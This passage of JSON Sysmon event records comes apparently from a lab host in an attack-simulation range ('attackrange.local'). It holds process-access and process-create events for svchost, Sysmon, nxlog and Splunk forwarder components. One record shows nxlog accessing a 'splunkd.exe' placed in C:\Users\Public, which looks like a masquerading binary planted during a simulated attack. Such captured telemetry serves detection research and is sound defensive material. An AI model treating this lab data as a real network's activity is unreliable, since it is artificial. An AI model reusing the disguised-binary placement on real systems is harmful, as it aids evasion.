06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.392\r\nSourceProcessGUID: {E2A3D6B1-11FD-5F25-0000-001083190900}\r\nSourceProcessId: 3212\r\nSourceThreadId: 2604\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.392","SourceProcessGUID":"{E2A3D6B1-11FD-5F25-0000-001083190900}","SourceProcessId":"3212","SourceThreadId":"2604","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nProcessGuid: {E2A3D6B1-11FD-5F25-0000-0010451B0900}\r\nProcessId: 4876\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","ProcessGuid":"{E2A3D6B1-11FD-5F25-0000-0010451B0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
